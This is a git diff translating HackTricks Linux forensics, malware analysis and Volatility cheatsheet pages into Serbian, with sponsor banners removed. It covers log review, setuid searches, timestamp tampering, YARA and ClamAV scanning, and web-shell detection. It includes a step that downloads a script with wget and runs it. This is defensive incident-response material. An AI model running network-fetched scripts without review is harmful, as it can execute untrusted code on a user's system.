Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. +> Linux sistemski logovi i audit pod-sistemi mogu biti onemogućeni ili obrisani tokom upada ili incidenta sa zlonamernim softverom. 
Pošto logovi na Linux sistemima obično sadrže neke od najkorisnijih informacija o zlonamernim aktivnostima, napadači ih rutinski brišu. Stoga, prilikom ispitivanja dostupnih log datoteka, važno je tražiti praznine ili neuredne unose koji bi mogli biti indikacija brisanja ili manipulacije. -**Linux maintains a command history for each user**, stored in: +**Linux održava istoriju komandi za svakog korisnika**, koja se čuva u: - \~/.bash_history - \~/.zsh_history 
@@ -297,42 +257,39 @@ Linux systems track user activities and system events through various log files. - \~/.python_history - \~/.\*\_history -Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins. +Pored toga, komanda `last -Faiwx` pruža listu prijava korisnika. Proverite je za nepoznate ili neočekivane prijave. -Check files that can grant extra rprivileges: +Proverite datoteke koje mogu dodeliti dodatne privilegije: -- Review `/etc/sudoers` for unanticipated user privileges that may have been granted. -- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted. -- Examine `/etc/groups` to identify any unusual group memberships or permissions. -- Examine `/etc/passwd` to identify any unusual group memberships or permissions. +- Pregledajte `/etc/sudoers` za neočekivane privilegije korisnika koje su možda dodeljene. +- Pregledajte `/etc/sudoers.d/` za neočekivane privilegije korisnika koje su možda dodeljene. +- Istražite `/etc/groups` da identifikujete bilo kakva neobična članstva u grupama ili dozvole. +- Istražite `/etc/passwd` da identifikujete bilo kakva neobična članstva u grupama ili dozvole. -Some apps alse generates its own logs: +Neke aplikacije takođe generišu svoje logove: -- **SSH**: Examine _\~/.ssh/authorized_keys_ and _\~/.ssh/known_hosts_ for unauthorized remote connections. -- **Gnome Desktop**: Look into _\~/.recently-used.xbel_ for recently accessed files via Gnome applications. -- **Firefox/Chrome**: Check browser history and downloads in _\~/.mozilla/firefox_ or _\~/.config/google-chrome_ for suspicious activities. -- **VIM**: Review _\~/.viminfo_ for usage details, such as accessed file paths and search history. -- **Open Office**: Check for recent document access that may indicate compromised files. -- **FTP/SFTP**: Review logs in _\~/.ftp_history_ or _\~/.sftp_history_ for file transfers that might be unauthorized. 
-- **MySQL**: Investigate _\~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities. -- **Less**: Analyze _\~/.lesshst_ for usage history, including viewed files and commands executed. -- **Git**: Examine _\~/.gitconfig_ and project _.git/logs_ for changes to repositories. +- **SSH**: Istražite _\~/.ssh/authorized_keys_ i _\~/.ssh/known_hosts_ za neovlašćene udaljene konekcije. +- **Gnome Desktop**: Pogledajte _\~/.recently-used.xbel_ za nedavno pristupane datoteke putem Gnome aplikacija. +- **Firefox/Chrome**: Proverite istoriju pretraživača i preuzimanja u _\~/.mozilla/firefox_ ili _\~/.config/google-chrome_ za sumnjive aktivnosti. +- **VIM**: Pregledajte _\~/.viminfo_ za detalje o korišćenju, kao što su pristupene putanje datoteka i istorija pretrage. +- **Open Office**: Proverite za nedavni pristup dokumentima koji mogu ukazivati na kompromitovane datoteke. +- **FTP/SFTP**: Pregledajte logove u _\~/.ftp_history_ ili _\~/.sftp_history_ za transfer fajlova koji bi mogli biti neovlašćeni. +- **MySQL**: Istražite _\~/.mysql_history_ za izvršene MySQL upite, što može otkriti neovlašćene aktivnosti u bazi podataka. +- **Less**: Analizirajte _\~/.lesshst_ za istoriju korišćenja, uključujući pregledane datoteke i izvršene komande. +- **Git**: Istražite _\~/.gitconfig_ i projekat _.git/logs_ za promene u repozitorijumima. -### USB Logs +### USB logovi -[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. +[**usbrip**](https://github.com/snovvcrash/usbrip) je mali komad softvera napisan u čistom Python 3 koji analizira Linux log datoteke (`/var/log/syslog*` ili `/var/log/messages*` u zavisnosti od distribucije) za konstruisanje tabela istorije USB događaja. 
-It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list). - -### Installation +Zanimljivo je **znati sve USB uređaje koji su korišćeni** i biće korisnije ako imate autorizovanu listu USB uređaja da pronađete "događaje kršenja" (korišćenje USB uređaja koji nisu na toj listi). +### Instalacija ```bash pip3 install usbrip usbrip ids download #Download USB ID database ``` - -### Examples - +### Primeri ```bash usbrip events history #Get USB history of your curent linux machine usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user @@ -340,40 +297,30 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR usbrip ids download #Downlaod database usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid ``` +Više primera i informacija unutar github-a: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) +## Pregled korisničkih naloga i aktivnosti prijavljivanja -
+Istražite _**/etc/passwd**_, _**/etc/shadow**_ i **bezbednosne logove** za neobične nazive ili naloge koji su kreirani i ili korišćeni u bliskoj blizini poznatih neovlašćenih događaja. Takođe, proverite moguće sudo brute-force napade.\ +Pored toga, proverite datoteke kao što su _**/etc/sudoers**_ i _**/etc/groups**_ za neočekivane privilegije dodeljene korisnicima.\ +Na kraju, potražite naloge sa **bez lozinki** ili **lako pogađenim** lozinkama. -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +## Istraživanje fajl sistema -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} +### Analiza struktura fajl sistema u istraživanju malvera -## Review User Accounts and Logon Activities +Kada istražujete incidente sa malverom, struktura fajl sistema je ključni izvor informacija, otkrivajući kako redosled događaja tako i sadržaj malvera. Međutim, autori malvera razvijaju tehnike za ometanje ove analize, kao što su modifikovanje vremenskih oznaka fajlova ili izbegavanje fajl sistema za skladištenje podataka. -Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ -Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ -Finally, look for accounts with **no passwords** or **easily guessed** passwords. - -## Examine File System - -### Analyzing File System Structures in Malware Investigation - -When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. 
However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage. - -To counter these anti-forensic methods, it's essential to: - -- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data. -- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers. -- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files. -- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content. -- **Identify setuid root files** using the command: `find / -user root -perm -04000 -print` This finds files with elevated permissions, which could be abused by attackers. -- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans. -- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together. -- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware. +Da biste se suprotstavili ovim anti-forenzičkim metodama, važno je: +- **Sprovesti temeljnu analizu vremenskih linija** koristeći alate kao što su **Autopsy** za vizualizaciju vremenskih linija događaja ili **Sleuth Kit's** `mactime` za detaljne podatke o vremenskim linijama. +- **Istražiti neočekivane skripte** u sistemskom $PATH, koje mogu uključivati shell ili PHP skripte koje koriste napadači. +- **Istražiti `/dev` za atipične fajlove**, jer tradicionalno sadrži specijalne fajlove, ali može sadržati i fajlove povezane sa malverom. +- **Pretražiti skrivene fajlove ili direktorijume** sa imenima kao što su ".. 
" (tačka tačka razmak) ili "..^G" (tačka tačka kontrola-G), koji mogu skrivati zlonamerni sadržaj. +- **Identifikovati setuid root fajlove** koristeći komandu: `find / -user root -perm -04000 -print` Ovo pronalazi fajlove sa povišenim privilegijama, koje napadači mogu zloupotrebiti. +- **Pregledati vremenske oznake brisanja** u inode tabelama kako bi se uočila masovna brisanja fajlova, što može ukazivati na prisustvo rootkit-ova ili trojanaca. +- **Inspektovati uzastopne inode** za obližnje zlonamerne fajlove nakon identifikacije jednog, jer su možda postavljeni zajedno. +- **Proveriti uobičajene binarne direktorijume** (_/bin_, _/sbin_) za nedavno modifikovane fajlove, jer bi ovi mogli biti izmenjeni od strane malvera. ````bash # List recent files in a directory: ls -laR --sort=time /bin``` 
@@ -381,58 +328,43 @@ ls -laR --sort=time /bin``` # Sort files in a directory by inode: ls -lai /bin | sort -n``` ```` - > [!NOTE] -> Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. +> Imajte na umu da **napadač** može **modifikovati** **vreme** kako bi **datoteke izgledale** **legitimno**, ali ne može **modifikovati** **inode**. Ako otkrijete da **datoteka** pokazuje da je kreirana i modifikovana u **isto vreme** kao i ostale datoteke u istoj fascikli, ali je **inode** **neočekivano veći**, onda su **vremenske oznake te datoteke modifikovane**. -## Compare files of different filesystem versions +## Uporedite datoteke različitih verzija datotečnog sistema -### Filesystem Version Comparison Summary +### Sažetak uporedbe verzija datotečnog sistema -To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands: - -- **To find new files**, compare two directories: +Da bismo uporedili verzije datotečnog sistema i precizno odredili promene, koristimo pojednostavljene `git diff` komande: +- **Da pronađete nove datoteke**, uporedite dve fascikle: ```bash git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/ ``` - -- **For modified content**, list changes while ignoring specific lines: - +- **Za izmenjen sadržaj**, navedite promene ignorišući specifične linije: ```bash git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time" ``` - -- **To detect deleted files**: - +- **Da biste otkrili obrisane fajlove**: ```bash git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ ``` +- **Opcije filtriranja** (`--diff-filter`) pomažu 
u sužavanju na specifične promene kao što su dodati (`A`), obrisani (`D`) ili izmenjeni (`M`) fajlovi. +- `A`: Dodati fajlovi +- `C`: Kopirani fajlovi +- `D`: Obrisani fajlovi +- `M`: Izmenjeni fajlovi +- `R`: Preimenovani fajlovi +- `T`: Promene tipa (npr., fajl u symlink) +- `U`: Neusaglašeni fajlovi +- `X`: Nepoznati fajlovi +- `B`: Pokvareni fajlovi -- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files. - - `A`: Added files - - `C`: Copied files - - `D`: Deleted files - - `M`: Modified files - - `R`: Renamed files - - `T`: Type changes (e.g., file to symlink) - - `U`: Unmerged files - - `X`: Unknown files - - `B`: Broken files - -## References +## Reference - [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf) - [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) - [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203) -- **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides** +- **Knjiga: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides** {{#include ../../banners/hacktricks-training.md}} - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index c7edd6650..53e806d6a 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -1,12 +1,12 @@ -# Malware Analysis +# Analiza Malvera {{#include ../../banners/hacktricks-training.md}} -## Forensics CheatSheets +## Forenzičke CheatSheets [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/) -## Online Services +## Online Usluge - [VirusTotal](https://www.virustotal.com/gui/home/upload) - [HybridAnalysis](https://www.hybrid-analysis.com) 
@@ -14,136 +14,119 @@ - [Intezer](https://analyze.intezer.com) - [Any.Run](https://any.run/) -## Offline Antivirus and Detection Tools +## Offline Antivirus i Alati za Detekciju ### Yara -#### Install - +#### Instaliraj ```bash sudo apt-get install -y yara ``` +#### Pripremite pravila -#### Prepare rules - -Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Create the _**rules**_ directory and execute it. This will create a file called _**malware_rules.yar**_ which contains all the yara rules for malware. - +Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za malware sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Kreirajte _**rules**_ direktorijum i izvršite ga. Ovo će kreirati datoteku pod nazivom _**malware_rules.yar**_ koja sadrži sva yara pravila za malware. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py ``` - -#### Scan - +#### Skeniranje ```bash yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` +#### YaraGen: Proverite malver i kreirajte pravila -#### YaraGen: Check for malware and Create rules - -You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. 
Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) - +Možete koristiti alat [**YaraGen**](https://github.com/Neo23x0/yarGen) za generisanje yara pravila iz binarnog fajla. Pogledajte ove tutorijale: [**Deo 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deo 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deo 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash - python3 yarGen.py --update - python3.exe yarGen.py --excludegood -m ../../mals/ +python3 yarGen.py --update +python3.exe yarGen.py --excludegood -m ../../mals/ ``` - ### ClamAV -#### Install - +#### Instaliraj ``` sudo apt-get install -y clamav ``` - -#### Scan - +#### Skeniranje ```bash sudo freshclam #Update rules clamscan filepath #Scan 1 file clamscan folderpath #Scan the whole folder ``` - ### [Capa](https://github.com/mandiant/capa) -**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as: +**Capa** otkriva potencijalno zlonamerne **mogućnosti** u izvršnim datotekama: PE, ELF, .NET. Tako će pronaći stvari kao što su Att\&ck taktike, ili sumnjive mogućnosti kao što su: -- check for OutputDebugString error -- run as a service -- create process +- provera za OutputDebugString grešku +- pokretanje kao servis +- kreiranje procesa -Get it int he [**Github repo**](https://github.com/mandiant/capa). +Preuzmite ga u [**Github repo**](https://github.com/mandiant/capa). ### IOCs -IOC means Indicator Of Compromise. 
An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\ -To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster. +IOC znači Indikator Kompromitacije. IOC je skup **uslova koji identifikuju** neki potencijalno neželjeni softver ili potvrđeni **malver**. Plave ekipe koriste ovu vrstu definicije da **traže ovakve zlonamerne datoteke** u svojim **sistemima** i **mrežama**.\ +Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i kreira se IOC za taj malver, druge Plave ekipe mogu to koristiti da brže identifikuju malver. -A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. +Alat za kreiranje ili modifikovanje IOCs je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Možete koristiti alate kao što su [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOCs na uređaju**. ### Loki -[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ -Detection is based on four detection methods: - +[**Loki**](https://github.com/Neo23x0/Loki) je skener za Simple Indicators of Compromise.\ +Detekcija se zasniva na četiri metode detekcije: ``` 1. File Name IOC - Regex match on full file path/name +Regex match on full file path/name 2. Yara Rule Check - Yara signature matches on file data and process memory +Yara signature matches on file data and process memory 3. 
Hash Check - Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files +Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files 4. C2 Back Connect Check - Compares process connection endpoints with C2 IOCs (new since version v.10) +Compares process connection endpoints with C2 IOCs (new since version v.10) ``` - ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener za malver za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je oko pretnji sa kojima se suočavaju deljeni hostovani okruženja. Koristi podatke o pretnjama iz sistema za detekciju upada na mrežnom rubu kako bi izvukao malver koji se aktivno koristi u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama se takođe dobijaju iz korisničkih prijava putem LMD checkout funkcije i resursa zajednice za malver. ### rkhunter -Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware. - +Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema na moguće **rootkitove** i malver. ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` - ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques. 
+[**FLOSS**](https://github.com/mandiant/flare-floss) je alat koji pokušava da pronađe obfuskirane stringove unutar izvršnih datoteka koristeći različite tehnike. ### PEpper -[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules). +[PEpper ](https://github.com/Th3Hurrican3/PEpper)proverava neke osnovne stvari unutar izvršne datoteke (binarni podaci, entropija, URL-ovi i IP adrese, neka yara pravila). ### PEstudio -[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques. +[PEstudio](https://www.winitor.com/download) je alat koji omogućava dobijanje informacija o Windows izvršnim datotekama kao što su uvozi, izvozi, zaglavlja, ali takođe proverava virus total i pronalazi potencijalne Att\&ck tehnike. ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**. +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) je alat za detekciju da li je datoteka **kriptovana** i takođe pronalazi **pakere**. ### NeoPI -[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)je Python skripta koja koristi razne **statističke metode** za detekciju **obfuskovanog** i **kriptovanog** sadržaja unutar tekstualnih/skript datoteka. Namena NeoPI-a je da pomogne u **detekciji skrivenog web shell koda**. 
### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) daje sve od sebe da detektuje **obfuskovani**/**sumnjivi kod** kao i datoteke koje koriste **PHP** funkcije često korišćene u **malverima**/webshell-ima. ### Apple Binary Signatures -When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.** - +Kada proveravate neki **uzorak malvera**, uvek treba da **proverite potpis** binarne datoteke jer **razvijač** koji je potpisao može već biti **povezan** sa **malverom.** ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" 
@@ -154,19 +137,18 @@ codesign --verify --verbose /Applications/Safari.app #Check if the signature is valid spctl --assess --verbose /Applications/Safari.app ``` +## Tehnike Detekcije -## Detection Techniques +### Stacking Fajlova -### File Stacking +Ako znate da je neka fascikla koja sadrži **fajlove** web servera **poslednji put ažurirana na neki datum**. **Proverite** **datum** kada su svi **fajlovi** na **web serveru** kreirani i modifikovani i ako je neki datum **sumnjiv**, proverite taj fajl. -If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file. +### Osnovne Linije -### Baselines +Ako **fajlovi** u fascikli **ne bi trebali biti modifikovani**, možete izračunati **hash** **originalnih fajlova** iz fascikle i **uporediti** ih sa **trenutnim**. Sve što je modifikovano će biti **sumnjivo**. -If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**. +### Statistička Analiza -### Statistical Analysis - -When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. +Kada je informacija sačuvana u logovima, možete **proveriti statistiku kao što je koliko puta je svaki fajl web servera bio pristupljen, jer bi web shell mogao biti jedan od naj**. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md index 1c8be749a..8b099d131 100644 
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md @@ -1,49 +1,37 @@ -# Memory dump analysis +# Analiza memorijskog ispisa {{#include ../../../banners/hacktricks-training.md}} -
+## Početak -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - -## Start - -Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). +Počnite **pretragu** za **malverom** unutar pcap-a. Koristite **alate** navedene u [**Analiza malvera**](../malware-analysis.md). ## [Volatility](volatility-cheatsheet.md) -**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations. +**Volatility je glavni open-source okvir za analizu memorijskih ispisa**. Ovaj Python alat analizira ispise iz spoljašnjih izvora ili VMware VM-ova, identifikujući podatke kao što su procesi i lozinke na osnovu OS profila ispisa. Proširiv je sa dodacima, što ga čini veoma svestranim za forenzičke istrage. -[**Find here a cheatsheet**](volatility-cheatsheet.md) +[**Ovde pronađite cheatsheet**](volatility-cheatsheet.md) -## Mini dump crash report +## Izveštaj o mini ispadu -When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump. +Kada je ispis mali (samo nekoliko KB, možda nekoliko MB), onda je verovatno reč o izveštaju o mini ispadu, a ne o memorijskom ispustu. 
![](<../../../images/image (532).png>) -If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed: +Ako imate instaliran Visual Studio, možete otvoriti ovu datoteku i povezati neke osnovne informacije kao što su naziv procesa, arhitektura, informacije o izuzecima i moduli koji se izvršavaju: ![](<../../../images/image (263).png>) -You can also load the exception and see the decompiled instructions +Takođe možete učitati izuzetak i videti dekompilirane instrukcije ![](<../../../images/image (142).png>) ![](<../../../images/image (610).png>) -Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump. +U svakom slučaju, Visual Studio nije najbolji alat za izvođenje analize dubine ispisa. -You should **open** it using **IDA** or **Radare** to inspection it in **depth**. +Trebalo bi da ga **otvorite** koristeći **IDA** ili **Radare** da biste ga pregledali u **dubini**. ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index f6a63c08f..f98986240 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md @@ -4,13 +4,8 @@ ​ -
- -​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} -If you need a tool that automates memory analysis with different scan levels and runs multiple Volatility3 plugins in parallel, you can use autoVolatility3:: [https://github.com/H3xKatana/autoVolatility3/](https://github.com/H3xKatana/autoVolatility3/) +Ako vam je potreban alat koji automatizuje analizu memorije sa različitim nivoima skeniranja i pokreće više Volatility3 dodataka paralelno, možete koristiti autoVolatility3:: [https://github.com/H3xKatana/autoVolatility3/](https://github.com/H3xKatana/autoVolatility3/) ```bash # Full scan (runs all plugins) python3 autovol3.py -f MEMFILE -o OUT_DIR -s full 
@@ -22,66 +17,57 @@ python3 autovol3.py -f MEMFILE -o OUT_DIR -s minimal python3 autovol3.py -f MEMFILE -o OUT_DIR -s normal ``` - -If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) - +Ako želite nešto **brzo i ludo** što će pokrenuti nekoliko Volatility dodataka paralelno, možete koristiti: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) ```bash python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # It will use the most important plugins (could use a lot of space depending on the size of the memory) ``` - -## Installation +## Instalacija ### volatility3 - ```bash git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 python3 setup.py install python3 vol.py —h ``` - ### volatility2 {{#tabs}} {{#tab name="Method1"}} - ``` Download the executable from https://www.volatilityfoundation.org/26 ``` - {{#endtab}} -{{#tab name="Method 2"}} - +{{#tab name="Metoda 2"}} ```bash git clone https://github.com/volatilityfoundation/volatility.git cd volatility python setup.py install ``` - {{#endtab}} {{#endtabs}} -## Volatility Commands +## Volatility komande -Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan) +Pristupite zvaničnoj dokumentaciji u [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan) -### A note on “list” vs. “scan” plugins +### Napomena o “list” vs. “scan” pluginovima -Volatility has two main approaches to plugins, which are sometimes reflected in their names. 
“list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes (locate and walk the linked list of `_EPROCESS` structures in memory), OS handles (locating and listing the handle table, dereferencing any pointers found, etc). They more or less behave like the Windows API would if requested to, for example, list processes. +Volatility ima dva glavna pristupa pluginovima, koji se ponekad odražavaju u njihovim imenima. “list” pluginovi će pokušati da se kreću kroz Windows Kernel strukture kako bi prikupili informacije kao što su procesi (lociranje i prolazak kroz povezanu listu `_EPROCESS` struktura u memoriji), OS handle-ovi (lociranje i listanje tabele handle-ova, dereferenciranje bilo kojih pronađenih pokazivača, itd). Oni se više-manje ponašaju kao što bi se Windows API ponašao kada bi se, na primer, tražilo da listaju procese. -That makes “list” plugins pretty fast, but just as vulnerable as the Windows API to manipulation by malware. For instance, if malware uses DKOM to unlink a process from the `_EPROCESS` linked list, it won’t show up in the Task Manager and neither will it in the 